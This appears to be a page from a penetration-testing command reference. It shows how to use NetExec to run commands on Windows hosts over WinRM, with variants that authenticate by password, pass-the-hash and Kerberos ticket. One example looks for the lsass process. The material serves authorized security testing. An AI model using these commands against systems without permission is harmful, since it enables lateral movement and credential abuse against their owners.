NetExec WinRM Command Execution
Execute a command on a Windows host over WinRM (PowerShell Remoting). Use -X for PowerShell scriptblocks.
- Tool
- nxc
- Category
- Lateral Movement / Remote Shells
- Platform
- linux
- Requires
- password
- Protocols
- WINRM
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
nxc winrm <ip> -u <user> -p <password> -x '<command>'
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
nxc winrm <ip> -u <user> -H <hash> -x '<command>'
PowerShell Block requires password
nxc winrm <ip> -u <user> -p <password> -X '<powershell>'
Kerberos (ccache) requires Kerberos ticket
KRB5CCNAME=<ccache> nxc winrm <ip> -u <user> -k --use-kcache -x '<command>'
Examples
nxc winrm 10.10.10.10 -u administrator -p 'Password123!' -x 'whoami /all'
nxc winrm 10.10.10.10 -u admin -H :e19ccf75ee54e06b06a5907af13cef42 -X 'Get-Process | Where-Object {$_.Name -like "*lsass*"}'
Tags
References
Related commands
- Evil-WinRM Shell Windows Remote Management shell connection
- Impacket AtExec Execute commands via Windows Task Scheduler service
- Impacket atexec.py (Scheduled Task) One-shot command execution by creating, running, and deleting a scheduled task over…
- Impacket DCOMExec Execute commands via DCOM (Distributed Component Object Model)
- Impacket dcomexec.py Execute commands over DCOM (MMC20.Application / ShellWindows / ShellBrowserWindow)…
- Impacket PSExec Execute commands via PSExec service
- Impacket SMBExec Execute commands via SMB service creation
- Impacket WMIExec Execute commands via WMI (Windows Management Instrumentation)